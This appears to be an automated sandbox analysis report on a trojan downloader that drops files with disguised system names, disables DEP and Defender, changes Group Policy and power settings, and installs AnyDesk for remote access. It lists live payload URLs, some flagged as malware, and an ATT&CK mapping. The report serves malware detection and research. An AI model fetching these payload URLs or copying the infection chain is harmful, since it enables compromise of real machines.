    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
    Source: C:\Intel\curl.exeCode function: 34_2_002CEDCF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_002CEDCF
    Source: C:\Intel\curl.exeCode function: 34_2_002CC584 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,34_2_002CC584
    Source: C:\Intel\curl.exeCode function: 34_2_0022AC50 GetStdHandle,GetFileType,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,34_2_0022AC50
    Source: C:\Intel\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Disables DEP (Data Execution Prevention) for certain images
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers DisableNXShowUIJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers DisableNXShowUIJump to behavior
    Modifies Group Policy settings
    Source: C:\Intel\dc.exeFile written: C:\Windows\System32\GroupPolicy\gpt.ini
    Modifies power options to not sleep / hibernate
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
    Source: AnyDesk.exe, 00000036.00000000.20555806082.000000000165A000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: release/win_8.0.14
    Source: AnyDesk.exe, 00000036.00000000.20555806082.000000000165A000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: .itext.text.custom3b1bfbef334434f66640155f39e4c33brelease/win_8.0.1413967ce7c71d8c19a49dd697dbd0dec1c8d166bf
    Source: svchost.exe, 0000002C.00000002.20487095875.000000000157A000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: 13967ce7c71d8c19a49dd697dbd0dec1c8d166bfrelease/win_8.0.143b1bfbef334434f66640155f39e4c33b
    Source: svchost.exe, 0000002C.00000002.20482948709.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: /dbd0dec1c8d166bfrelease/win_8.0.143b1bfbef334434f66640155f39e4c33b
    Source: svchost.exe, 0000002A.00000002.20529019891.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: *dbd0dec1c8d166bfrelease/win_8.0.143b1bfbef334434f66640155f39e4c33b
    Source: C:\Intel\curl.exeCode function: 34_2_001F80B0 bind,WSAGetLastError,34_2_001F80B0
    Source: C:\Intel\curl.exeCode function: 34_2_001FC810 getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,closesocket,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,34_2_001FC810
    Source: C:\Intel\curl.exeCode function: 34_2_001DD110 htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,34_2_001DD110

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting    		1
    Spearphishing Link    		421
    Windows Management Instrumentation    		1
    Scripting    		1
    DLL Side-Loading    		21
    Disable or Modify Tools    		1
    Credential API Hooking    		2
    System Time Discovery    		Remote Services11
    Archive Collected Data    		1
    Data Obfuscation    		Exfiltration Over Other Network Medium11
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts2
    Native API    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Deobfuscate/Decode Files or Information    		41
    Input Capture    		1
    Network Service Discovery    		Remote Desktop Protocol1
    Credential API Hooking    		12
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts12
    Command and Scripting Interpreter    		1
    Windows Service    		1
    Windows Service    		3
    Obfuscated Files or Information    		Security Account Manager4
    File and Directory Discovery    		SMB/Windows Admin Shares41
    Input Capture    		11
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		212
    Process Injection    		1
    Software Packing    		NTDS147
    System Information Discovery    		Distributed Component Object ModelInput Capture1
    Non-Standard Port    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd1
    Registry Run Keys / Startup Folder    		1
    Scheduled Task/Job    		1
    DLL Side-Loading    		LSA Secrets541
    Security Software Discovery    		SSHKeylogging3
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Registry Run Keys / Startup Folder    		1
    File Deletion    		Cached Domain Credentials331
    Virtualization/Sandbox Evasion    		VNCGUI Input Capture25
    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
    Masquerading    		DCSync3
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job331
    Virtualization/Sandbox Evasion    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Access Token Manipulation    		/etc/passwd and /etc/shadow1
    Remote System Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
    Process Injection    		Network Sniffing1
    System Network Configuration Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Hidden Files and Directories    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588958 Sample: Yv24LkKBY6.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 105 downdown.ru 2->105 107 www.4t-niagara.com 2->107 109 2 other IPs or domains 2->109 125 Suricata IDS alerts for network traffic 2->125 127 Antivirus detection for URL or domain 2->127 129 Antivirus / Scanner detection for submitted sample 2->129 131 7 other signatures 2->131 10 Yv24LkKBY6.exe 251 8 2->10         started        14 AnyDesk.exe 2->14         started        17 msedge.exe 2->17         started        19 8 other processes 2->19 signatures3 process4 dnsIp5 97 C:\Intel\curl.exe, PE32 10->97 dropped 171 Disables DEP (Data Execution Prevention) for certain images 10->171 173 Uses cmd line tools excessively to alter registry or file data 10->173 21 cmd.exe 2 10->21         started        24 cmd.exe 2 10->24         started        27 cmd.exe 1 10->27         started        33 13 other processes 10->33 117 relay-30ea2fb5.net.anydesk.com 160.202.165.71, 443, 49766, 49767 DEDICATEDUS New Zealand 14->117 119 239.255.102.18, 10074, 10455, 10484 unknown Reserved 14->119 175 Antivirus detection for dropped file 14->175 177 Multi AV Scanner detection for dropped file 14->177 179 Detected unpacking (changes PE section rights) 14->179 185 4 other signatures 14->185 121 192.168.11.20, 10074, 10455, 10484 unknown unknown 17->121 123 239.255.255.250, 1900 unknown Reserved 17->123 99 C:\Windows\System32\config\...\download_cache, COM 17->99 dropped 101 C:\Windows\System32\config\...\cache, COM 17->101 dropped 181 Creates files in the system32 config directory 17->181 183 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->183 29 AnyDesk.exe 19->29         started        31 conhost.exe 19->31         started        file6 signatures7 process8 file9 149 Uses ping.exe to sleep 21->149 35 cmd.exe 21->35         started        38 driver.exe 21->38         started        41 svchost.exe 21->41         started        51 10 other processes 21->51 93 C:\Intel\rezet.cmd, ASCII 24->93 dropped 151 Uses schtasks.exe or at.exe to add and modify task schedules 24->151 153 Uses powercfg.exe to modify the power settings 24->153 155 Uses ping.exe to check the status of other devices and networks 24->155 157 Modifies power options to not sleep / hibernate 24->157 43 conhost.exe 24->43         started        45 conhost.exe 27->45         started        47 conhost.exe 33->47         started        49 conhost.exe 33->49         started        54 10 other processes 33->54 signatures10 process11 dnsIp12 133 Modifies power options to not sleep / hibernate 35->133 56 dc.exe 35->56         started        60 powershell.exe 35->60         started        62 cmd.exe 35->62         started        71 8 other processes 35->71 75 C:\Intel\Trays\unins000.exe, PE32 38->75 dropped 77 C:\Intel\Trays\delReg.exe, PE32 38->77 dropped 79 C:\Intel\Trays\Trays.exe, PE32 38->79 dropped 89 5 other malicious files 38->89 dropped 81 C:\Intel\AnyDesk\AnyDesk.exe, PE32 41->81 dropped 135 Antivirus detection for dropped file 41->135 137 Multi AV Scanner detection for dropped file 41->137 139 Detected unpacking (changes PE section rights) 41->139 141 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->141 64 svchost.exe 41->64         started        67 svchost.exe 41->67         started        111 downdown.ru 185.125.51.5, 49754, 49755, 49756 INPLATLABS-ASRU Russian Federation 51->111 113 127.0.0.1 unknown unknown 51->113 115 www.4t-niagara.com 94.23.158.211, 80 OVHFR France 51->115 83 C:\Intel\svchost.exe, PE32 51->83 dropped 85 C:\Intel\driver.exe, PE32 51->85 dropped 87 C:\Intel\dc.exe, PE32 51->87 dropped 91 2 other malicious files 51->91 dropped 143 Found stalling execution ending in API Sleep call 51->143 145 Installs a global get message hook 51->145 147 Drops PE files with benign system names 51->147 69 4t-min64.exe 51->69         started        file13 signatures14 process15 dnsIp16 95 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 56->95 dropped 159 Multi AV Scanner detection for dropped file 56->159 161 Allocates memory in foreign processes 56->161 163 Modifies Group Policy settings 56->163 73 dc.exe 56->73         started        165 Loading BitLocker PowerShell Module 60->165 103 boot.net.anydesk.com 57.129.37.157, 443, 49761, 49762 ATGS-MMD-ASUS Belgium 64->103 167 System process connects to network (likely due to code injection or exploit) 64->167 169 Installs a global get message hook 69->169 file17 signatures18 process19

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Yv24LkKBY6.exe65%VirustotalBrowse
    Yv24LkKBY6.exe55%ReversingLabsWin32.Trojan.Generic
    Yv24LkKBY6.exe100%AviraTR/Dldr.Agent.jljtp
    Yv24LkKBY6.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Intel\AnyDesk\AnyDesk.exe100%AviraTR/Agent.nyvag
    C:\Intel\svchost.exe100%AviraTR/Agent.nyvag
    C:\Intel\AnyDesk\AnyDesk.exe50%ReversingLabsWin32.Trojan.Generic
    C:\Intel\Trays\4t-min64.exe0%ReversingLabs
    C:\Intel\Trays\7z.dll0%ReversingLabs
    C:\Intel\Trays\ShellEh6055.dll2%ReversingLabs
    C:\Intel\Trays\ShellEh6055x64.dll3%ReversingLabs
    C:\Intel\Trays\Tray.dll0%ReversingLabs
    C:\Intel\Trays\Trays.exe4%ReversingLabs
    C:\Intel\Trays\delReg.exe2%ReversingLabs
    C:\Intel\Trays\unins000.exe4%ReversingLabs
    C:\Intel\blat.exe0%ReversingLabs
    C:\Intel\curl.exe3%ReversingLabs
    C:\Intel\dc.exe50%ReversingLabsWin32.Hacktool.DisableDefender
    C:\Intel\driver.exe3%ReversingLabs
    C:\Intel\svchost.exe50%ReversingLabsWin32.Trojan.Generic
    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache0%ReversingLabs
    C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://downdown.ru/wol.jpg8V0%Avira URL Cloudsafe
    http://www.4t-niagara.com/checkupdate.phpnia0%Avira URL Cloudsafe
    http://downdown.ru/svchost.jpgC:0%Avira URL Cloudsafe
    http://www.4t-niagara.com/checkupdate.php8na0%Avira URL Cloudsafe
    http://www.pdf-tools.com0%Avira URL Cloudsafe
    http://downdown.ru/wol.jpgy0%Avira URL Cloudsafe
    https://help.anydesk.com0%Avira URL Cloudsafe
    http://downdown.ru/driver.jpg100%Avira URL Cloudmalware
    http://downdown.ru/blat.jpg:0%Avira URL Cloudsafe
    http://downdown.ru/wol.jpgWinsta00%Avira URL Cloudsafe
    http://www.innosetup.com/0%Avira URL Cloudsafe
    http://www.4t-niagara.com/files/4t-min.exe0%Avira URL Cloudsafe
    https://help.anydesk.com/0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_next.html03b0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_faq.htmll2-370%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray.html0%Avira URL Cloudsafe
    http://downdown.ru/blat.jpg100%Avira URL Cloudmalware
    http://www.4t-niagara.com0%Avira URL Cloudsafe
    http://downdown.ru/wol.j0%Avira URL Cloudsafe
    http://downdown.ru/Trays.jpgC:0%Avira URL Cloudsafe
    http://downdown.ru/blat.jpgs0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_order.html03b0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray.html50%Avira URL Cloudsafe
    http://www.4t-niagara.com/checkupdate.phz(0%Avira URL Cloudsafe
    http://downdown.ru/wol.jpg.0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_faq.htmllk0%Avira URL Cloudsafe
    http://downdown.ru/svchost.jpg6S0%Avira URL Cloudsafe
    http://downdown.ru/svchost.0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_order.htmlU0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray.htmltmll0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray.htmlgestion...ACrei&0%Avira URL Cloudsafe
    http://downdown.ru/driver.jpgC:0%Avira URL Cloudsafe
    http://www.blat.net/h0%Avira URL Cloudsafe
    http://www.4t-niagara.com/checkupdate.phpb80%Avira URL Cloudsafe
    http://downdown.ru/Trays.jpgWinsta00%Avira URL Cloudsafe
    http://4t-niagara.com/webimage.html0%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray_faq.html0%Avira URL Cloudsafe
    http://downdown.ru/blat.jpgWinsta00%Avira URL Cloudsafe
    http://www.4t-niagara.com/tray.htmltmll=0%Avira URL Cloudsafe
    http://www.dk-soft.org/0%Avira URL Cloudsafe
    http://downdown.ru/dc.jp0%Avira URL Cloudsafe
    https://help.anydesk.com/HelpLinkInstallLocationAnyDesk0%Avira URL Cloudsafe
    http://downdown.ru/wol.jpg;0%Avira URL Cloudsafe
